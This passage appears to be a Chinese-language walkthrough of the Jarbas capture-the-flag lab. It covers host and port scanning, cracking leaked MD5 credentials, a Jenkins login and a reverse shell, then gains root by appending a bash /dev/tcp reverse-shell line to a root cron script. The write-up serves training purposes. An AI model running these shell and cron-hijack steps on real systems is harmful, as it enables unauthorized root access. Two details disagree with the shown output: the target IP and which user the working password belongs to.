JARBAS
主机发现
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| kali@kali:~$ sudo nmap -sn 192.168.19.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:52 EST
Nmap scan report for 192.168.19.1
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.19.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:FF:BF:31 (VMware)
Nmap scan report for 192.168.19.178
Host is up (0.00026s latency).
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Nmap scan report for 192.168.19.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:FB:15:2E (VMware)
Nmap scan report for 192.168.19.131
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 15.07 seconds
|
131是本机,所以177是我们目标机器
开放端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| kali@kali:~$ sudo nmap --min-rate 10000 -p- 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:54 EST
Nmap scan report for 192.168.19.178
Host is up (0.000091s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds
|
对开放端口进行深度扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| kali@kali:~$ sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:56 EST
Nmap scan report for 192.168.19.178
Host is up (0.0024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
kali@kali:~$ sudo nmap -sU -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:58 EST
Nmap scan report for 192.168.19.178
Host is up (0.00027s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds
kali@kali:~$ sudo nmap --script=vuln -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:58 EST
Nmap scan report for 192.168.19.178
Host is up (0.00085s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 41.98 seconds
|
好像没扫描到啥有用的,8080端口有个robots.txt,访问看看
存下来
1
| # we don't want robots to click "build" links
|
打点
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| ┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.19.178 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.19.178
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/03 10:13:47 Starting gobuster in directory enumeration mode
===============================================================
Progress: 22683 / 62285 (36.42%)[ERROR] 2022/12/03 10:13:49 [!] parse "http://192.168.19.178/error\x1f_log": net/url: invalid control character in URL
Progress: 58726 / 62285 (94.29%)===============================================================
2022/12/03 10:13:53 Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.19.178 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.19.178
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php
[+] Timeout: 10s
===============================================================
2022/12/03 10:15:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 32808]
/access.html (Status: 200) [Size: 359]
/.html (Status: 403) [Size: 207]
Progress: 65315 / 186855 (34.95%)[ERROR] 2022/12/03 10:15:20 [!] parse "http://192.168.19.178/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:20 [!] parse "http://192.168.19.178/besalu\t.php": net/url: invalid control character in URL
Progress: 69445 / 186855 (37.17%)[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log.php": net/url: invalid control character in URL
/.html (Status: 403) [Size: 207]
/index.html (Status: 200) [Size: 32808]
/.html (Status: 403) [Size: 207]
Progress: 185050 / 186855 (99.03%)===============================================================
2022/12/03 10:15:34 Finished
===============================================================
|
发现
/index.html
/access.html
/index.html没什么价值就是主页面
我们看一下access.html
1
2
3
4
5
| Creds encrypted in a safe way!
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
|
被加密的凭据以一个安全的方式,通过观察可以知道他应该md5加密的
看不出来可以用hash-identifier
去解密一下
可以得到
1
2
3
4
| tiago:italia99
trindade:vipsu
eder:marianna
|
尝试登录,发现使用eder vipsu可以登录成功
获得普通权限shell
因为前面我们知道了我们要测试的主机是linux系统,所以第一个Windows的批处理命令应该是执行不了的
我们写个反弹shell
建立监听,获得了shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.19.131] from (UNKNOWN) [192.168.19.178] 39862
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ip a
ip a
bash-4.2$ ifconfig
ifconfig
bash-4.2$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$
|
查看计划任务
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cat /etc/crontabs
cat /etc/crontabs
cat: /etc/crontabs: No such file or directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
bash-4.2$
|
我们可以看到计划任务有个sh文件,每5分钟以root用户权限执行
我们开启监听,然后往里面写入bash反弹shell的命令
1
2
3
| bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.19.131/6666 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.19.131/6666 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$
|
计划任务反弹shell获得root权限,拿到flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| kali@kali:~$ nc -vlnp 6666
listening on [any] 6666 ...
connect to [192.168.19.131] from (UNKNOWN) [192.168.19.178] 34548
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:cc:ab:79 brd ff:ff:ff:ff:ff:ff
inet 192.168.19.178/24 brd 192.168.19.255 scope global dynamic ens33
valid_lft 1127sec preferred_lft 1127sec
inet6 fe80::9114:a460:aa3:9dd5/64 scope link
valid_lft forever preferred_lft forever
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!
Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)
Thanks for appreciating this machine.
@tiagotvrs
[root@jarbas ~]#
|
总结
首先我们nmap端口扫描发现端口,通过两个web端口的浏览以及目录爆破,我们发现8080是jenkins这一套内容管理系统的登录页面,这时候我们想到三种路径,一是爆破,二是在网上找系统的默认用户名密码,三是根据寻找网站泄露的信息。在目录爆破中发现access.html页面,发现是被md5加密的,然后我们去解密,通过密码喷射,我们登录了后台。jenkins是一套内容管理系统,利用方式相对固定,我们写入了bash的反弹shell,发现获得的shell权限是受限制的,交互是不完整的,所以我们提升权限要找不需要了解系统内核等更多信息的方式,所以我们想到了计划任务,从计划任务反弹了root权限的shell。
